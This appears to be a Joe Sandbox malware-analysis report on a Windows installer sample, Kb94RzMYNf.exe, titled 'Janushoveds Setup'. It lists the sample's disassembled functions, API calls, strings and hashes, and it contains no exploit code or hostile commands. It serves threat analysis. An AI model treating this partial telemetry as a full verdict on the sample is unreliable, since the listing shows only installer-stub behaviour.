Associated: 00000000.00000002.1359895311.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Kb94RzMYNf.jbxd

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: 62695d5c8c86e882195e65ce0f7765e430518bd8f6887f1e42abcc260ebb5c8d
Instruction ID: 76e81b74098be2a3706baaa1e1a2527734eadd1478321fb398c06c814fc07831
Opcode Fuzzy Hash: 62695d5c8c86e882195e65ce0f7765e430518bd8f6887f1e42abcc260ebb5c8d
Instruction Fuzzy Hash: B5D05E33B05100DBDB10DFE8AE08ADD77B5AB80338B24817BE601F21E4D6B8C6509B1D

Function 00404160 Relevance: 1.5, APIs: 1, Instructions: 9windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00010476,00000000,00000000,00000000), ref: 00404172

Memory Dump Source

Source File: 00000000.00000002.1359567053.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1359529656.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1359593459.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1359623133.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1359623133.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1359623133.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1359623133.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1359623133.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1359623133.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1359623133.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1359895311.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Kb94RzMYNf.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: 13c84271a77af59bb4435d25b14bc6de72d6595d127670e1db8d8b2520383cf4
Instruction ID: c65f6eba747e04129790f2b1b21bae9375029ebd28d99582ecd6e8b4464eea9f
Opcode Fuzzy Hash: 13c84271a77af59bb4435d25b14bc6de72d6595d127670e1db8d8b2520383cf4
Instruction Fuzzy Hash: 56C09B717447007BDA119F609D4DF1777646764702F1544797344F51D0C774D450D61C

Function 00404149 Relevance: 1.5, APIs: 1, Instructions: 6windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000028,?,00000001,00403F75), ref: 00404157

Memory Dump Source

Source File: 00000000.00000002.1359567053.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1359529656.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1359593459.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1359623133.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1359623133.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1359623133.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1359623133.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1359623133.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1359623133.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1359623133.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1359895311.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Kb94RzMYNf.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: 2cd36f0d48dcadf8a0967ef3185ed5b2b885b7484726fb5ce8841cd1b5828a50
Instruction ID: 10f0f1b1c79289e67bc844ccbe5aec3c597dbf8b190d8890215e27c6ac549869
Opcode Fuzzy Hash: 2cd36f0d48dcadf8a0967ef3185ed5b2b885b7484726fb5ce8841cd1b5828a50
Instruction Fuzzy Hash: 27B0123A180A00BBDE118B00EE0AF857E62F7AC701F018438B340250F0CAF300E0DB08

Function 00403258 Relevance: 1.5, APIs: 1, Instructions: 6COMMON

Download Yara Rule

APIs

SetFilePointer.KERNELBASE(00000000,00000000,00000000,00402FB5,?,?,?,"C:\Users\user\Desktop\Kb94RzMYNf.exe",00403536,?), ref: 00403266

Memory Dump Source

Source File: 00000000.00000002.1359567053.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1359529656.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1359593459.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1359623133.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1359623133.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1359623133.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1359623133.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1359623133.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1359623133.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1359623133.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1359895311.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Kb94RzMYNf.jbxd

Similarity

API ID: FilePointer
String ID:
API String ID: 973152223-0
Opcode ID: 1c6da78d27ebc38603b4c87e6ff41e0916c1b34e9bb95e36f46a9ca6431a4e31
Instruction ID: 64c0fffafe8abe290eaf2022e63b776f1a4a3bd25e2fde741040b5855636c72c
Opcode Fuzzy Hash: 1c6da78d27ebc38603b4c87e6ff41e0916c1b34e9bb95e36f46a9ca6431a4e31
Instruction Fuzzy Hash: 70B01231140300BFDA214F00DF09F057B21AB90700F10C034B344780F086711075EB0D

Function 00404136 Relevance: 1.5, APIs: 1, Instructions: 4COMMON

Download Yara Rule

APIs

KiUserCallbackDispatcher.NTDLL(?,00403F0E), ref: 00404140

Memory Dump Source

Source File: 00000000.00000002.1359567053.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1359529656.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1359593459.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1359623133.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1359623133.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1359623133.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1359623133.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1359623133.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1359623133.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1359623133.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1359895311.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Kb94RzMYNf.jbxd

Similarity

API ID: CallbackDispatcherUser
String ID:
API String ID: 2492992576-0
Opcode ID: 09484a4c0bb45b5d2a25c6d29655a2ab56222c5132b062e897c9f059ee403ea7
Instruction ID: 67e4992f565e21c11dbb8c54ac12ec2a13ba7de1e04ee321f93102ddb6e8c06b
Opcode Fuzzy Hash: 09484a4c0bb45b5d2a25c6d29655a2ab56222c5132b062e897c9f059ee403ea7
Instruction Fuzzy Hash: B2A00176944501EBCE129B90EF49D0ABB62EBE4701B5185B9A685900348A728862EB69

Non-executed Functions

Function 00404B2B Relevance: 63.5, APIs: 33, Strings: 3, Instructions: 481windowmemoryCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,000003F9), ref: 00404B43
GetDlgItem.USER32(?,00000408), ref: 00404B4E
GlobalAlloc.KERNEL32(00000040,?), ref: 00404B98
LoadBitmapW.USER32(0000006E), ref: 00404BAB
SetWindowLongW.USER32(?,000000FC,00405123), ref: 00404BC4
ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404BD8
ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00404BEA
SendMessageW.USER32(?,00001109,00000002), ref: 00404C00
SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404C0C
SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00404C1E
DeleteObject.GDI32(00000000), ref: 00404C21
SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00404C4C
SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00404C58
SendMessageW.USER32(?,00001132,00000000,?), ref: 00404CEE
SendMessageW.USER32(?,0000110A,00000003,00000000), ref: 00404D19
SendMessageW.USER32(?,00001132,00000000,?), ref: 00404D2D
GetWindowLongW.USER32(?,000000F0), ref: 00404D5C
SetWindowLongW.USER32(?,000000F0,00000000), ref: 00404D6A
ShowWindow.USER32(?,00000005), ref: 00404D7B
SendMessageW.USER32(?,00000419,00000000,?), ref: 00404E78
SendMessageW.USER32(?,00000147,00000000,00000000), ref: 00404EDD
SendMessageW.USER32(?,00000150,00000000,00000000), ref: 00404EF2
SendMessageW.USER32(?,00000420,00000000,00000020), ref: 00404F16
SendMessageW.USER32(?,00000200,00000000,00000000), ref: 00404F36
ImageList_Destroy.COMCTL32(?), ref: 00404F4B
GlobalFree.KERNEL32(?), ref: 00404F5B
SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00404FD4
SendMessageW.USER32(?,00001102,?,?), ref: 0040507D
SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 0040508C
InvalidateRect.USER32(?,00000000,00000001), ref: 004050AC
ShowWindow.USER32(?,00000000), ref: 004050FA
GetDlgItem.USER32(?,000003FE), ref: 00405105
ShowWindow.USER32(00000000), ref: 0040510C

Strings

N, xrefs: 00404DB6
M, xrefs: 00404CD5
, xrefs: 004050E4

Memory Dump Source

Source File: 00000000.00000002.1359567053.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1359529656.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1359593459.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1359623133.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1359623133.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1359623133.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1359623133.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1359623133.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1359623133.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1359623133.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1359895311.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Kb94RzMYNf.jbxd

Similarity

API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
String ID: $M$N
API String ID: 1638840714-813528018
Opcode ID: 573b9ff58b83ee1454a1a693654ce7e624338e230ee879d58558bf43250699fe
Instruction ID: 92be4e2f0a71e0becefd48613cebd317121b53e3330ca333a75e7b8088edbb55
Opcode Fuzzy Hash: 573b9ff58b83ee1454a1a693654ce7e624338e230ee879d58558bf43250699fe
Instruction Fuzzy Hash: 49027FB0900209EFDB209F95DD85AAE7BB5FB84314F10817AF610BA2E1C7799D42CF58

Function 004045AF Relevance: 23.0, APIs: 10, Strings: 3, Instructions: 275stringCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,000003FB), ref: 004045FE
SetWindowTextW.USER32(00000000,?), ref: 00404628
SHBrowseForFolderW.SHELL32(?), ref: 004046D9
CoTaskMemFree.OLE32(00000000), ref: 004046E4
lstrcmpiW.KERNEL32(: Completed,0042D248,00000000,?,?), ref: 00404716
lstrcatW.KERNEL32(?,: Completed), ref: 00404722
SetDlgItemTextW.USER32(?,000003FB,?), ref: 00404734

Part of subcall function 00405779: GetDlgItemTextW.USER32(?,?,00000400,0040476B), ref: 0040578C

Part of subcall function 004062E4: CharNextW.USER32(?,*?|<>/":,00000000,00000000,774D3420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\Kb94RzMYNf.exe",0040327B,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004034C8), ref: 00406347
Part of subcall function 004062E4: CharNextW.USER32(?,?,?,00000000), ref: 00406356
Part of subcall function 004062E4: CharNextW.USER32(?,00000000,774D3420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\Kb94RzMYNf.exe",0040327B,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004034C8), ref: 0040635B
Part of subcall function 004062E4: CharPrevW.USER32(?,?,774D3420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\Kb94RzMYNf.exe",0040327B,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004034C8), ref: 0040636E

GetDiskFreeSpaceW.KERNEL32(0042B218,?,?,0000040F,?,0042B218,0042B218,?,00000001,0042B218,?,?,000003FB,?), ref: 004047F7
MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404812

Part of subcall function 0040496B: lstrlenW.KERNEL32(0042D248,0042D248,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404A0C
Part of subcall function 0040496B: wsprintfW.USER32 ref: 00404A15
Part of subcall function 0040496B: SetDlgItemTextW.USER32(?,0042D248), ref: 00404A28

Strings

A, xrefs: 004046D2
: Completed, xrefs: 00404710, 00404715, 00404720
C:\Users\user\AppData\Local\neoimpressionism, xrefs: 004046FF

Memory Dump Source

Source File: 00000000.00000002.1359567053.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1359529656.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1359593459.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1359623133.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1359623133.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1359623133.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1359623133.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1359623133.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1359623133.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1359623133.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1359895311.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Kb94RzMYNf.jbxd

Similarity

API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
String ID: : Completed$A$C:\Users\user\AppData\Local\neoimpressionism
API String ID: 2624150263-1758597695
Opcode ID: 384026e9e9e5746c7f9dfe92ab28aced1d92048ea58c9d733445c263ea4897ef
Instruction ID: d238959ebaf25b01a045b7410cfe39ad7a074a1c0e4d09bd35cd2a97c430e078
Opcode Fuzzy Hash: 384026e9e9e5746c7f9dfe92ab28aced1d92048ea58c9d733445c263ea4897ef
Instruction Fuzzy Hash: 25A171B1900209ABDB11AFA5CD85AAFB7B8EF85314F10843BF601B72D1D77C89418B6D

Function 00402095 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 129comCOMMON

Download Yara Rule

APIs

CoCreateInstance.OLE32(004085F0,?,00000001,004085E0,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 00402114

Strings

C:\Users\user\AppData\Local\neoimpressionism, xrefs: 00402154

Memory Dump Source

Source File: 00000000.00000002.1359567053.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1359529656.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1359593459.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1359623133.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1359623133.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1359623133.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1359623133.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1359623133.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1359623133.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1359623133.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1359895311.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Kb94RzMYNf.jbxd

Similarity

API ID: CreateInstance
String ID: C:\Users\user\AppData\Local\neoimpressionism
API String ID: 542301482-3269196450
Opcode ID: 2d60422b51706b5f8de98bdbfcbd79ecc62fd17b82eb2d48cb5e1808d9985389
Instruction ID: c02b05589a316e099dfb0d7529d526a00835c5092bff723ddb1c3c0439b696db
Opcode Fuzzy Hash: 2d60422b51706b5f8de98bdbfcbd79ecc62fd17b82eb2d48cb5e1808d9985389
Instruction Fuzzy Hash: E5412A71A00208AFCF00DFA4CD88AAD7BB6FF48314B24457AF515EB2D1DBB99A41CB54

Function 00407040 Relevance: 2.8, Strings: 2, Instructions: 300COMMON

Download Yara Rule

Strings

p!C, xrefs: 00407274
p!C, xrefs: 00407190, 004071B2, 00407262, 00407234, 004071B7

Memory Dump Source

Source File: 00000000.00000002.1359567053.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1359529656.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1359593459.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1359623133.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1359623133.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1359623133.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1359623133.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1359623133.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1359623133.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1359623133.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1359895311.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Kb94RzMYNf.jbxd

Similarity

API ID:
String ID: p!C$p!C
API String ID: 0-3125587631
Opcode ID: b391703ce6aa9d184f83615265780e2503839b4fa6daee6685a5ac04655da8ea
Instruction ID: 15f69c865bc8d9ec0e9cf8060aa07673d574756af28658d99b75493111c5da86
Opcode Fuzzy Hash: b391703ce6aa9d184f83615265780e2503839b4fa6daee6685a5ac04655da8ea
Instruction Fuzzy Hash: 1DC15831E042598BCF18CF68D4905EEB7B2FF99314F25826AD8567B380D7346A42CF95

Function 00406869 Relevance: .3, Instructions: 334COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1359567053.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1359529656.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1359593459.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1359623133.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1359623133.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1359623133.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1359623133.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1359623133.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1359623133.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1359623133.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1359895311.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Kb94RzMYNf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9639f9c0007cb4c124acbb6985d7f6f1a05031d6bc3fffd11e08744ca1378656
Instruction ID: c1774f2f946c4964f784778ac851d6f11cf56bcc8977249e4dfbf1b2b48c2d4a
Opcode Fuzzy Hash: 9639f9c0007cb4c124acbb6985d7f6f1a05031d6bc3fffd11e08744ca1378656
Instruction Fuzzy Hash: B2E17A71A0070ADFDB24CF58C880BAAB7F5EF45305F15892EE497A7291D738AA91CF14

Function 00401000 Relevance: 28.1, APIs: 14, Strings: 2, Instructions: 125COMMON

Download Yara Rule

APIs

DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
BeginPaint.USER32(?,?), ref: 00401047
GetClientRect.USER32(?,?), ref: 0040105B
CreateBrushIndirect.GDI32(00000000), ref: 004010CF
FillRect.USER32(00000000,?,00000000), ref: 004010E4
DeleteObject.GDI32(?), ref: 004010ED
CreateFontIndirectW.GDI32(?), ref: 00401105
SetBkMode.GDI32(00000000,00000001), ref: 00401126
SetTextColor.GDI32(00000000,000000FF), ref: 00401130
SelectObject.GDI32(00000000,?), ref: 00401140
DrawTextW.USER32(00000000,Janushoveds Setup,000000FF,00000010,00000820), ref: 00401156
SelectObject.GDI32(00000000,00000000), ref: 00401160
DeleteObject.GDI32(?), ref: 00401165
EndPaint.USER32(?,?), ref: 0040116E

Strings

Janushoveds Setup, xrefs: 00401150
F, xrefs: 0040100C

Memory Dump Source

Source File: 00000000.00000002.1359567053.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1359529656.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1359593459.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1359623133.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1359623133.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1359623133.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1359623133.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1359623133.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1359623133.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1359623133.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1359895311.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Kb94RzMYNf.jbxd

Similarity

API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
String ID: F$Janushoveds Setup
API String ID: 941294808-3463238137
Opcode ID: 2f348b4d91443a475dcd35d85824ce7e5a946905d26cbae13f88812008241038
Instruction ID: 99fcf956b6c6492db4cb7183bc7c026c58e5ce6762c1973727186ff321cad974
Opcode Fuzzy Hash: 2f348b4d91443a475dcd35d85824ce7e5a946905d26cbae13f88812008241038
Instruction Fuzzy Hash: 81418A71800209AFCF058F95DE459AFBBB9FF44315F04842EF991AA1A0C778EA54DFA4

Function 00405D7F Relevance: 24.6, APIs: 11, Strings: 3, Instructions: 131stringmemoryCOMMON

Download Yara Rule

APIs

lstrcpyW.KERNEL32(004308E8,NUL,?,00000000,?,?,00405F12,?,?), ref: 00405D8E
CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,?,00405F12,?,?), ref: 00405DB2
GetShortPathNameW.KERNEL32(?,004308E8,00000400), ref: 00405DBB

Part of subcall function 00405B8A: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405E6B,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405B9A
Part of subcall function 00405B8A: lstrlenA.KERNEL32(00000000,?,00000000,00405E6B,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405BCC

GetShortPathNameW.KERNEL32(004310E8,004310E8,00000400), ref: 00405DD8
wsprintfA.USER32 ref: 00405DF6
GetFileSize.KERNEL32(00000000,00000000,004310E8,C0000000,00000004,004310E8,?,?,?,?,?), ref: 00405E31
GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 00405E40
lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405E78
SetFilePointer.KERNEL32(0040A558,00000000,00000000,00000000,00000000,004304E8,00000000,-0000000A,0040A558,00000000,[Rename],00000000,00000000,00000000), ref: 00405ECE
GlobalFree.KERNEL32(00000000), ref: 00405EDF
CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00405EE6

Part of subcall function 00405C25: GetFileAttributesW.KERNELBASE(00000003,00402E2E,C:\Users\user\Desktop\Kb94RzMYNf.exe,80000000,00000003,?,?,"C:\Users\user\Desktop\Kb94RzMYNf.exe",00403536,?), ref: 00405C29
Part of subcall function 00405C25: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,"C:\Users\user\Desktop\Kb94RzMYNf.exe",00403536,?), ref: 00405C4B

Strings

%ls=%ls, xrefs: 00405DEC
[Rename], xrefs: 00405E60, 00405E72
NUL, xrefs: 00405D88

Memory Dump Source

Source File: 00000000.00000002.1359567053.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1359529656.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1359593459.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1359623133.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1359623133.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1359623133.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1359623133.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1359623133.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1359623133.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1359623133.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1359895311.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Kb94RzMYNf.jbxd

Similarity

API ID: File$CloseGlobalHandleNamePathShortlstrcpylstrlen$AllocAttributesCreateFreePointerSizewsprintf
String ID: %ls=%ls$NUL$[Rename]
API String ID: 222337774-899692902
Opcode ID: 30846692017808bfd9aa764f556a0762a2c37fabb6d3c616e21c38c05ea1324d
Instruction ID: 0ee0d7f4969d0e8ff8498481139b35b4394cb67f0e1a7fb2b2bdcfef73d002b4
Opcode Fuzzy Hash: 30846692017808bfd9aa764f556a0762a2c37fabb6d3c616e21c38c05ea1324d
Instruction Fuzzy Hash: 59310230200B147BD2207B619D49F6B3A6CDF45759F14003BBA85F62D2DA7C9E018EEC

Function 004042C5 Relevance: 13.6, APIs: 9, Instructions: 99windowstringCOMMON

Download Yara Rule

APIs

CheckDlgButton.USER32(?,-0000040A,00000001), ref: 0040434F
GetDlgItem.USER32(?,000003E8), ref: 00404363
SendMessageW.USER32(00000000,0000045B,00000001), ref: 00404380
GetSysColor.USER32(?), ref: 00404391
